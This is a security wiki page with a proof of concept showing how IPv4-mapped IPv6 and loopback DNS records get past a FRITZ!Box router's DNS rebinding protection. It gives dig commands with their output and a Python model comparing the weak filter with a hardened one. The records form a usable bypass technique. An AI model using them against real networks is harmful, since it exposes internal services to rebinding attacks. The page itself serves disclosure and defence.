pwnwiki.com
Fixed version
>= 7.21
POC
Suppose the following resource records (RRs) are configured for different subdomains of example.com:

------------------------------------------------------------------------
private.example.com      1 IN A    192.168.178.20
local.example.com        1 IN A    127.0.0.1
privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20
------------------------------------------------------------------------

A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected (the A record pointing at a private IPv4 address is filtered):

------------------------------------------------------------------------
$ dig private.example.com @192.168.178.1

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com.           IN      A
------------------------------------------------------------------------

DNS requests for the subdomains privateipv6.example.com (an IPv4-mapped IPv6 address) and local.example.com (the IPv4 loopback address) return the configured resource records successfully, effectively bypassing the DNS rebinding protection:

------------------------------------------------------------------------
$ dig privateipv6.example.com @192.168.178.1 AAAA

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com.       IN      AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1      IN      AAAA    ::ffff:192.168.178.20

$ dig local.example.com @192.168.178.1

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.             IN      A

;; ANSWER SECTION:
local.example.com.      1       IN      A       127.0.0.1
------------------------------------------------------------------------
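As an added illustration (not part of the original advisory or of the FRITZ!Box firmware), the following Python models the two filter behaviours: a weak check that drops only RFC 1918 IPv4 answers, beside a hardened check that first unwraps IPv4-mapped IPv6 answers (and, as an extra case beyond the write-up, NAT64-prefixed ones) and also rejects loopback and other non-global addresses. The records are constructed to mirror the three RRs in the PoC; all function names are my own.

```python
import ipaddress
from typing import Iterable, List, Tuple, Union

Addr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Record = Tuple[str, str, str]  # (owner name, RR type, rdata)

# Constructed records mirroring the three RRs in the write-up.
RECORDS: List[Record] = [
    ("private.example.com", "A", "192.168.178.20"),
    ("local.example.com", "A", "127.0.0.1"),
    ("privateipv6.example.com", "AAAA", "::ffff:192.168.178.20"),
]

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
NAT64_WKP = ipaddress.ip_network("64:ff9b::/96")  # RFC 6052 well-known prefix (extra case)


def weak_rejects(rdata: str) -> bool:
    """Model of the bypassed behaviour: only RFC 1918 IPv4 answers are dropped.
    127.0.0.1 is not RFC 1918 and an AAAA answer is never version 4, so both
    bypass records from the PoC pass through."""
    addr = ipaddress.ip_address(rdata)
    return addr.version == 4 and any(addr in net for net in RFC1918)


def unwrap_embedded_ipv4(addr: Addr) -> Addr:
    """Return the IPv4 host an IPv6 answer actually designates, if any.
    ::ffff:a.b.c.d (IPv4-mapped) and 64:ff9b::a.b.c.d (NAT64) both reach an
    IPv4 host; the filter must judge that host, not the IPv6 wrapper."""
    if addr.version == 6:
        if addr.ipv4_mapped is not None:
            return addr.ipv4_mapped
        if addr in NAT64_WKP:
            return ipaddress.IPv4Address(int(addr) & 0xFFFFFFFF)
    return addr


def hardened_rejects(rdata: str) -> bool:
    """Drop any answer that points at a non-global address after unwrapping."""
    addr = unwrap_embedded_ipv4(ipaddress.ip_address(rdata))
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


def answers_returned(records: Iterable[Record], rejects) -> List[str]:
    """Owner names whose answers a resolver using `rejects` would hand to the client."""
    return [name for name, _rtype, rdata in records if not rejects(rdata)]


if __name__ == "__main__":
    print("weak filter leaks:", answers_returned(RECORDS, weak_rejects))
    print("hardened filter leaks:", answers_returned(RECORDS, hardened_rejects))
```

Unwrapping before classifying also avoids over-blocking: an IPv4-mapped answer for a public host (e.g. ::ffff:93.184.216.34) is still returned by the hardened check.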